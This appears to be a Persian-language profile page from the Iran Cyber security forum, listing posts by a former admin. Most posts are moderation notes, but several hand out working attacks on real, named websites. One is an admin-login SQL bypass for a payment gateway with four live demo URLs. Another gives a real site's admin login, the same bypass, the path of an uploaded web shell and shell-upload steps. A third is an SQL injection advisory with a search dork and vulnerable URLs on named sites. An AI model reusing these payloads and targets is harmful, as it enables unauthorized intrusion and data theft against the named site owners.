رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Sir.h4m1D

Retired Admin
  • تعداد ارسال ها

    514
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1
  • Country

    ایران

تمامی مطالب نوشته شده توسط Sir.h4m1D

  1. Sir.h4m1D

    Wordpress Gravity Forms Plugin Exploit And File Upload

    سلام خسته نباشید 1 - این بخش برای کشفیات تیمی هستش https://iran-cyber.net/forums/threads/%D9%82%D9%88%D8%A7%D9%86%DB%8C%D9%86-%D8%A8%D8%AE%D8%B4-%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-%D8%AB%D8%A8%D8%AA-%D8%B4%D8%AF%D9%87.1550/ 2 - اینکه بهتره اکسپلویت رو قرار بدید و اگه زحمتی نیست آموزشش رو اینطور پست ها به اسپم بیشتر شبیه هستن تا مفید بودن ممنون ./
  2. Sir.h4m1D

    درامد رایگان بیت کوین

    سلام خسته نباشید ممنون از پست خوبتون ولی اخرین امتحان خودتون چه زمانی بوده ؟ چون تست کردم و چیزی نشده ! شاید بنده اشتباه میرم راه پیشنهادیتون رو اگه ممکنه فیلمی تهیه کنید از موضوع ! امثال بنده زیادن دیگه ./
  3. سلام 1- تیم دیفیس برای خودشون صفحه دیفیس مربوط به سایت ( ایران سایبر ) دارند 2- لطفا مبحثی که میذارید دقت کنید که در کدام بخش میذارید ! 3- نظرات اینجا با فشار دادن دکمه تشکر نشون داده میشه که راضی هستند یا خیر 1 اخطار در یک پست رعایت کنید ، ممنون ./
  4. Sir.h4m1D

    آموزش کامل باگ Remote File Include

    سلام لطفا از دکمه تشکر استفاده کنید و اسپم ندید ممنون ./
  5. Sir.h4m1D

    Target Trainings

    با سلام خدمت شما اول که جواب شما us pw : test و فقط sql نیست باگ این ساب xss و ... دوما اینجا جای تبلیغ دیگر گروه های امنیتی نیست و فعالیت در این تیم به معنای فعالیت به اسم ایران سایبر است سوما شما سه اخطار دریافت کردید لطفا رعایت کنید !
  6. خسته نباشید عنوان عوض شد ! لطفا موارد اموزشی رو که با ویدیو ضبط کردین با ( اموزش ) شروع کنید ! کلمه دیفیس زیاد مناسب نیست ! ممنون از شما ./
  7. Sir.h4m1D

    دیتابیس 8 سایت برتر جهان

    سلام خسته نباشید ممنون از پستتون ولی فکرکنم رمز اشتباه هستش ! فایل یاهو رو زدم رمز متاسفانه اشتباه بود ./
  8. Sir.h4m1D

    اموزش هک سایت با Havij

    خسته نباشید ممنون از فعالیتتون اگر میتونید پیوست کنید چون ماندگاری زیادی داره در اپلودسنتر ها متاسفانه بعد گذشت زمان دیلیت خواهد شد ممنون ./
  9. Sir.h4m1D

    تاپیک جامع ابزار های کرک Cracking Tools

    سلام خسته نباشيد هر برنامه اي كه قرار ميدين با هر فرمت اجرايي لطفا لينك اسكن قرار بدين ممنون
  10. taha tlg pm bde @bypass
  11. Sir.h4m1D

    مشکل باز نشدن 192.168.1.1

    اگه مودم رو ریست نکردین ( خاموش روشن ) انجام بدین درست میشه ولی اگه انجام دادین درست نشده بگین تا راهکار بگیم
  12. Sir.h4m1D

    Crackng CPanel New Method

    جوابی دریافت نمیکنید چون تاپیک برای یک الی دوساله پیشه در یک تاپیک اعلام کردین که لینک چنین اموزشی رو میخواید صبر کنید تا قرار داده بشه نه اینکه هی اسپم بدین ! قوانین انجمن رو رعایت کنید ./
  13. سلام خب اگه شما یکم در انجمن سرچ میکردین اموزش fckeditor زیاد گذاشته شده ! شل در این نوع ادیتور اجرا نمیشه در ورژن جدید ( قدیمی امکانش وجود داشته و با یک بایپس انجام میشده ) ممنون میشم اول سرچ کنید و دوم اینکه اموزش رو سعی کنید اختصاصی بسازید ( به اسم تیمی دیگر نباشه ) و سوم اینکه لطفا از عنوان بهتر استفاده کنید و نوع حملات رو شرح بدین ./
  14. سلام و خسته نباشید این اموزش از نظر بنده کامل اشتباهه و بقیه رو هم به اشتباه میندازه ! درسته که میتونید reverse ip بگیرید و سایت ها بیاد .... ولی همیشه این سایت درست نمیگه 70% و در بینگ درسته که شما زدین ip: x.,x,x,x, /public_html/ ! اگه یکم دقت کنید میبینید که این از چندتا باگ در سایت یوزر نشون میده ( sql و یا ... ) بهترین روش اینه که شما از یک سایت در سرور دسترسی بگیرید etc/passwd و named بگیرین ! خیلی ممنون ./
  15. Sir.h4m1D

    آی دی افراد در تلگرام

    سلام در مورد سوال شما باید عرض کنم که تلگرام آنقدر به خودش اعتماد داشته که بر روی مسنجر خود شرط بندی کرده ! که هرکس بتونه باگ یا اصلا همین نفوذ به سروری که میگین ( احتمالش واقعا خیلی کمه ) انجام بدن جایزه بزرگی مد نظر گرفته ! و تا الان هم باگه خاصی نبوده ! باز هم نمیشه گفت مسنجره قدرت مندی هستش !
  16. https://cxsecurity.com/issue/WLB-2016080111 http://irancybernews.org/en/ICNA/vuln/337/ ############################################################## # Exploit Title: Admin Bypass Scripts Payment Gateway ( دروازه پرداخت آنلاين طراحان وب ) # Date: 8/12/2016 # Exploit Author: Iran Cyber Security Group # Discovered By: sir.h4m1d # Vendor Homepage: iranwebhost.ir # Version: All version # Tested on: Windows ############################################################## [~] VULNERABILITY}~~ http://www.Site.com/pay/admin/ or /payment/admin/ [~] EXPLOIT: Username: '=' 'OR' Password: '=' 'OR' ############## [~] LIVE DEMO: # demo 1 : http://www.afpelevator.com/payment/admin/ # demo 2 : http://www.mahsan.net/pay/admin/ # demo 3 : http://www.iranwebhost.ir/pay/admin/ # demo 4 : https://bartarinpanlsms.net/pay/admin/ ###################################################################### # Contact mail: [email protected] # Offecial Website: http://iran-cyber.net # My Team : MOHAMAD-NOFOZI , root3r , sir.h4m1d , Promis , white.wolf , mr.s4jj4d , mr.turk , 0day , pi.hack , l3gi0n , nazanin_wild , 0xdevil #############################################################################
  17. سلام خدمت شما خسته نباشید در اول عرض کنم که این نوع باگ ها خیلی قدیمی هستند و اکثر 90% بسته شده اند و در ورژن های اولیه امکان اپلود شل بود که اون زمان هم خیلی کم شل میشد ! دوم عرض کنم که این تاپیک با موضوع all rfu در انجمن گذاشته شده با دورک و تمامی fck های موجود لطفا سرچ کنید http://www.iran-cyber.net/forums/threads/all-rfu-exploits.365/ ممنون ./
  18. Sir.h4m1D

    Target Trainings

    http://coplaste.com.br/admin/modulos/banner/img/alf.php http://coplaste.com.br/admin/login.php '=' 'OR' '=' 'OR' بایپس ادمین ( به پنل ادمین برین قسمت بنر شل خودتون رو اپلود کنید به هر فرمتی در صورت پاک شدن شل توضیح دادم )
  19. Sir.h4m1D

    Target Trainings

    سلام خدمت davala عزيز مرسي از فعاليتي كه انجام ميدين ! لطفا تارگت هايي كه ميذارين رو داخل تگ قرار بدين كه هم بعضي كلمات به هم چسبيده تبديل به شكلك نشوند هم بي نظمي به وجود نياد ! ممنون از شما ./
  20. Sir.h4m1D

    درخواست اموزش نفوذ با باگxss

    سلام خدمت شما اين تاپيك قديمي هستش لطفا تاپيك هاي قديمي رو بالا نياريد احتمالا رمز : iran-cyber.in Or iran-cyber.org
  21. exploit Title : Zarafe.net CMS SQL Injection Vulnerability Exploit Author : Iran Cyber Security Group (ICSG) Discovered By : 0x3a Vendor HomePage : www.zarrafe.net Version : 1.0 (Q1) Date : 4 April, 2016 Tested On : Internet Explorer , Win 98 ----------------------------------------- SQL Injection : For Finding Target First You Must Search The Dork And Select Your Target Dork : intext:"طراحی و پیاده سازی توسط زرافه دات نت" Vulnerable Page : news.php , news_view.php , product.php Vulnerable Variable : news_id= Demo : novinsystemfars.ir/news_view.php?news_id=30' pezeshkian-pharmacy.ir/news.php?news_id=3' sdshiraz.com/news.php?news_id=8' omidoor.com/products.php?product_category_code=12-15' meysam71.ir/news.php?khabar_id=10' etehadweb.ir/view_single_news.php?news_id=2 [+][+][+][+][+][+][+] WWW.IRAN-CYBER.NET[+] [+][+][+][+][+][+][+] </0x3a>
  22. سلام دوست عزیز لطفا فایل ها رو پیوست کنید ! ممنون ./
  23. Sir.h4m1D

    وایفابدون رمز

    عزیزم شما جوابتون رو دریافت کردید دوباره چه سوالی هست که میپرسید ؟ ایشون مک ادرس چند سیستم یا موبایل شخصی رو ست کردن و خیال راحت باز گذاشتند بدون رمز حتی اگر مک ادرس چند سیستم رو ست کنید و رمز هم بذاره شما رمز رو بدست بیارید نمیتونید وارد اون وای فای بشید تا طرف مک شما رو اضافه نکنه نمیتونید استفاده کنید و تمام
  24. Sir.h4m1D

    Datalife Cms

    سلام خدمت شما دوست عزیز بله مدیریت محتوا دیتالایف باگ sql داره که توسط تیم کشف شده و هنوز ثبت نکردیم یعنی ( پرایوت ) هست البته باگ های پابلیک شده هم هستند که هنوز پتچ نشده اند تست کنید بازم شاید به کارتون بیاد

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...